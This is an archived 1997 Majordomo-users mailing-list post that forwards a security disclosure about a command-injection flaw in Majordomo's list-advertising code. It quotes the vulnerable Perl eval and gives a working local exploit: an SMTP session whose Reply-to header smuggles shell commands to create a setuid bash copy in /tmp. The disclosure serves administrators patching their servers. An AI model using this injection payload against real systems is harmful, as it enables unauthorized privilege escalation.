Great Circle Associates Majordomo-Users
(August 1997) 		 
Indexed By Date: [Previous] [Next] Indexed By Thread: [Previous] [Next]
Subject: [Fwd: BoS: Vulnerability in Majordomo]
From: David Coe <david @ coe . woodbine . md . us>
Date: Sun, 24 Aug 1997 18:39:20 -0400
To: "list: Majordomo Users" <majordomo-users @ GreatCircle . COM> 
This appears to be true.  Anybody know how to fix it?

-- 
David Coe <david@coe.woodbine.md.us>
--- Begin Message ---
Subject: BoS: Vulnerability in Majordomo
From: Razvan Dragomirescu <drazvan @ kappa . ro>
Date: Sun, 24 Aug 1997 15:17:18 +0300 (EET DST)
To: best-of-security @ cyber . com . au
Old-status: O
Old-x-envelope-from: drazvan@pop3.kappa.ro Sun Aug 24 22:11:46 1997
Resent-date: Sun, 24 Aug 1997 15:18:02 +0300 (EET DST)
Resent-from: best-of-security @ cyber . com . au
Resent-message-id: <Pine.LNX.3.96.970824151802.13326B@pop3.kappa.ro>
Resent-sender: best-of-security-request @ cyber . com . au
Resent-to: best-of-security @ cyber . com . au 

Hello all,

I have discovered a vulnerablility in "majordomo" that allows local and
remote users to execute commands with the rights of the user running the server. This user is usually in the daemon group, so this can be quite harmful.

Still, there is a condition for the exploit to work. The server should
have at least one list that uses the "advertise" or "noadvertise"
directives in the configuration files. These directives indicate if the
list should (or should not) be included in a reply to a "LISTS" command
depending on the address the request came from. The exploit also works if
the server has one or more "hidden" lists (see the Majordomo documentation
for details).

Here's a piece of the configuration file:

-- lrazvan.config --

        # advertise            [regexp_array] (undef) <majordomo>
        # If the requestor email address matches one of these regexps, then
        # the list will be listed in the output of a lists command. Failure
        # to match any regexp excludes the list from the output. The
        # regexps under noadvertise override these regexps.
advertise           <<  END
/.*/
END
-- end lrazvan.config --

The one above tells majordomo to include this list in any "LISTS" request.

The problem is that when the server finds a list that has one of these
attributes ("advertise" or "noadvertise"), it will try to match the
reply-to address against these patterns. It uses an "eval" command to do this.

Let's take a look at the PERL source (the do_lists procedure):

-- majordomo --
foreach $i (@array) {
                      $command = "(q~$reply_addr~ =~ $i)";
                      $result = 1, last if (eval $command);
                   }

-- end majordomo --

$reply_addr is the result of some paranoid validation. It cannot contain
<,>,[,],-,+,(,),; etc..
But with a few tricks, this won't be a problem :).

Now, for the exploits. There a two of them, one for the local users who
just want a setuid shell (with the rights of the server owner, usually
majordomo.daemon), and one for the remote users who might want to copy
some files or execute commands remotely (the old "mail foo@foo.net <
/etc/passwd" won't work, it contains '<' ...).

Local exploit:
--exploit--
telnet localhost 25

helo localhost
mail from: user
rcpt to: majordomo (or whatever the name of the majordomo user is)
data
From: user
To: majordomo
Reply-to: a~.`/bin/cp\${IFS}/bin/bash\${IFS}/tmp/lord&&/bin/chmod\${IFS}4777\${IFS}/tmp/lord`.q~a/ad=cucu/c=blu\\\@kappa.ro

LISTS
--- End Message ---
Follow-Ups:
Indexed By Date Previous: MAJORDOMO ABORT (mj_majordomo) (fwd)
From: Mel <root@Tribe.OnlineToday.Com>
Next: BoS: Vulnerability in Majordomo (fwd)
From: Matt Harrington <matt@msg.ucsf.edu>
Indexed By Thread Previous: MAJORDOMO ABORT (mj_majordomo) (fwd)
From: Mel <root@Tribe.OnlineToday.Com>
Next: Re: [Fwd: BoS: Vulnerability in Majordomo]
From: Jason L Tibbitts III <tibbs@hpc.uh.edu>
Google
 
Search Internet Search www.greatcircle.com